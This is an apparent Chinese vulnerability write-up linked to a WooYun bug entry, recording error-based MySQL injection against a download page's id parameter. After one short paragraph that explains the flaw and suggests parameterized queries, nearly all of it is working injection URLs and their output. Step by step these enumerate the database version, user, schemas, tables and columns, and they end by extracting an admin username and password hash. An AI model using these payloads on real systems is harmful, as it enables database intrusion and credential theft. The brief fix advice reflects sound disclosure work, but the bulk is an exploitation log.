http://www.wooyun.org/bugs/wooyun-2010-01666

之前想找个测试，没想到这里就有，可以测试一下，做个记录而已。下面的请求都是基于报错的 MySQL 注入：看起来 id 路径参数被直接拼进了 SQL，group by floor(rand(0)*2) 引发的重复键错误把子查询结果带进了报错信息；修复时应对该参数做整数校验并使用参数化查询，同时关闭对外的数据库错误回显。

http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003

/data0/htdocs/leqi_new/app/myapp.php
或者

/**********version()**********/ 5.1.49-log
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

/**********user()**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
/**********database()**********/ leqi
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

/**********limit依次递归爆库**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
information_schema
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
leqi
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
test

/**********limit依次递归爆表名**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
users

/**********limit依次递归爆字段名**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
user_id,username,nickname,passwd,group_id
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
/wapc/5000_0005_003
11 21
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
/wapc/5000_0005_003
11 341 351 361
/**********爆数据**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
admin
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
6a8b4574ca231eb8bd52764d4978ffcd